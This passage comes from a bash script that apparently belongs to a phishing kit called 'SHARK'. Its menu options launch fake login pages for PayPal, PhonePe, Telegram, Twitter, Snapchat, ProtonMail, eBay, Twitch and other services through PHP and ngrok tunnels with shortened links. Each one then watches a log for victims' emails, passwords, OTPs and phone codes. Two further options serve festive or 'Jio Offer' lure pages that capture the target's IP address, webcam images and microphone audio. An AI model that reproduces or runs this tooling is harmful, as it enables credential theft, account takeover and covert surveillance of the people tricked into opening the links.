                           tail -f log.txt | grep -e "email" -e "otp" -e "OTP"                

                           break;

                   elif [ $option = 18 ]
	           then
                           cd $php/phonepay/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                
			   ( sleep 6 ) &> /dev/null & spinner1
          		   url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "number" -e "otp"                       

                           break;
			   
	            elif [ $option = 19 ]
	            then
                           cd $php/paypal/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
	                   url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "login_email" -e "login_password" -e "otpCode"    

                           break;
           
	            elif [ $option = 20 ]
	            then
                           cd $php/telegram/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "phone_number" -e "phone_code"     

                           break;
			   
	            elif [ $option = 21 ]
	            then
                           cd $php/twitter/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
	 	           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "phone_or_email" -e "password" -e "challenge_response"      

                           break;
                    
		    elif [ $option = 22 ]
	            then
                          cd $php/flipcart/
                          echo 
			  connection
                          ( sleep 5 ) &> /dev/null & spin_shark
                          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                          sleep 1
                          echo 
                          (sleep 6) &> /dev/null & spin
			  echo
			  tput civis
                          ngrok http 4444 > /dev/null 2>&1 &
                          ( sleep 18 ) &> /dev/null & spinner
                          echo 
			  tput cnorm
                          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                         
			  ( sleep 6 ) &> /dev/null & spinner1
		          url_shortner
			  read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			  clear
			  shark_logo
			  echo 
			  echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			  echo 
			  echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
			  echo
                          tail -f log.txt | grep -e "email" -e "password" -e "otp"     

                          break;
       
                  elif [ $option = 23 ]
	          then
                          cd $php/wordpress/
                          echo 
			  connection
                          ( sleep 5 ) &> /dev/null & spin_shark
                          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                          sleep 1
                          echo 
                          (sleep 6) &> /dev/null & spin
			  echo
			  tput civis
                          ngrok http 4444 > /dev/null 2>&1 &
                          ( sleep 18 ) &> /dev/null & spinner
                          echo 
			  tput cnorm
                          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			  ( sleep 6 ) &> /dev/null & spinner1
		          url_shortner
			  read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			  clear
			  shark_logo
			  echo 
			  echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			  echo 
			  echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                          echo 
                          tail -f log.txt | grep -e "log" -e "pwd"       

                          break;
			  
	           elif [ $option = 24 ]
	           then
                           cd $php/snapchat/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"  
                           echo 
                           tail -f log.txt | grep -e "username" -e "password" -e "Code"       

                           break;
			   
		    elif [ $option = 25 ]
	            then
                           cd $php/protonmail/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                         
			   ( sleep 6 ) &> /dev/null & spinner1
	              	   url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "username" -e "password"   

                           break;

                  elif [ $option = 26 ]
	          then
                           cd $php/stackoverflow/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "email" -e "password"                 

                           break;

                  elif [ $option = 27 ]
	          then
                           cd $php/ebay/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                        
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "userid" -e "pass" -e "pin"                       

                           break;

                  elif [ $option = 28 ]
	          then
                           cd $php/twitch/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
 		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "Username" -e "password" -e "otp"  

                           break;
                
		    elif [ $option = 29 ]
	            then
                           cd $php/ajio/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                        
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "username" -e "password"    

                           break;
			   
		  elif [ $option = 30 ]
	          then               
                           cd $php/mobikwik/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo
                           tail -f log.txt | grep -e "userId" -e "otp"     

                           break;
			   
		  elif [ $option = 31 ]
	          then        
		           
		           cd $php/Camera_hack
			   file_check
			   echo
			   clear
			   echo
			   echo -e "\e[1;32m >>> \e[1;93mChoose Your Tempelates\e[m"
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 1 \e[0m\e[1;31m]\e[0m\e[1;32m Diwali \e[0m" 
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 2 \e[0m\e[1;31m]\e[0m\e[1;32m Freinship Dare\e[0m" 
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 3 \e[0m\e[1;31m]\e[0m\e[1;32m Freindship Day \e[0m"
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 4 \e[0m\e[1;31m]\e[0m\e[1;32m Happy New Year \e[0m" 
			   echo
			   echo -e "\e[1;31m[\e[0m\e[1;77m 5 \e[0m\e[1;31m]\e[0m\e[1;32m Jio Offer \e[0m"
			   echo
			   read -p $'\e[1;91m[\e[0m\e[1;92m >>> \e[0m\e[1;91m]\e[0m\e[1;93m Enter Your Choice : \e[0m' page
			   if [ $page = 1 ]
			   then 
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           sed 's+forwarding_link+'$link'+g' diwali.html > index2.html
                           sed 's+forwarding_link+'$link'+g' template.php > index.php
		           elif [ $page = 2 ]
		           then 
		           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
		           sed 's+forwarding_link+'$link'+g' freindship_dare.html > index2.html
			   sed 's+forwarding_link+'$link'+g' template.php > index.php
			   elif [ $page = 3 ]
			   then 
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			   sed 's+forwarding_link+'$link'+g' freinship_day.html > index2.html
			   sed 's+forwarding_link+'$link'+g' template.php > index.php
			   elif [ $page = 4 ]
			   then 
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			   sed 's+forwarding_link+'$link'+g' happy_new_year.html > index2.html
			   sed 's+forwarding_link+'$link'+g' template.php > index.php
			   elif [ $page = 5 ]
			   then 
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			   sed 's+forwarding_link+'$link'+g' jio_offer.html > index2.html
			   sed 's+forwarding_link+'$link'+g' template.php > index.php
			   fi
			   echo
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo
			   while [ true ]; do
                           if [[ -e "ip.txt" ]]; then
			   printf "\n\e[1;92m[\e[0m+\e[1;92m] Target opened the link!\n"
			   echo
			   catch_ip
			   rm -rf ip.txt
			   fi
			   sleep 0.5
		           if [[ -e "Log.log" ]]; then
			   printf "\n\e[1;92m[\e[0m+\e[1;92m] Cam file received!\e[0m\n"
			   rm -rf Log.log
			   fi
			   sleep 0.5
			   mv cam* ${files}/Camera_hack >> /dev/null 2>&1 
			   done
			   
			   break;
			   
	           elif [ $option = 32 ]
	           then 
		            cd $php/Audio_hack
		            file_check
			    echo
			    default_redirect="https://www.youtube.com/channel/UCMhYgk0-nIHHtnRNkL9zpgQ/about"
                            printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Choose a distracting website (Default:\e[0m\e[1;77m https://youtube.com\e[0m\e[1;92m ): \e[0m" $default_redirect
                            read redirect_link
                            redirect_link="${redirect_link:-${default_redirect}}"
			    link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			    sed 's+forwarding_link+'$link'+g' template.php > index.php
			    sed 's+redirect_link+'$redirect_link'+g' js/_app.js > js/app.js
			    echo
			    connection
                            ( sleep 5 ) &> /dev/null & spin_shark
                            php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                            sleep 1
                            echo 
                            (sleep 6) &> /dev/null & spin
			    echo
			     tput civis
                            ngrok http 4444 > /dev/null 2>&1 &
                            ( sleep 18 ) &> /dev/null & spinner
                             echo 
			    tput cnorm
                            link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			    ( sleep 6 ) &> /dev/null & spinner1
		            url_shortner
			    read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			    clear
			    shark_logo
			    echo 
			    echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			    echo 
			    echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                            echo
		            while [ true ]; do
                            if [[ -e "ip.txt" ]]; then
		 	    printf "\n\e[1;92m[\e[0m+\e[1;92m] Target opened the link!\n"
			    echo
			    catch_ip
			    rm -rf ip.txt
			    fi
			    sleep 0.5
		            if [[ -e "Log.log" ]]; then
			    printf "\n\e[1;92m[\e[0m+\e[1;92m] Audio received!\e[0m\n"
			    rm -rf Log.log
			    fi
			    sleep 0.5
			    mv 20* ${files}/Audio_hack >> /dev/null 2>&1 
			    done
			   
		            break;
			   
	          elif [ $option = 99 ]
	          then     
		      echo
		      exit 
		      break;
		      
                  else 
		  
		  echo
		  echo -e "\e[92m[\e[94m!\e[92m]\e[91m Invalid option Try Again !! \e[m "
		  sleep 2
		  fi
                  done
		  
		  
#####################################################################
#                                                                   #
#      simply changing this banner will not make you developer      #
#                   CREATED BY ASHISH                               #
#                   KEEP SUPPORTING                                 #
#                      THANKYOU                                     #
#                                                                   #
#####################################################################
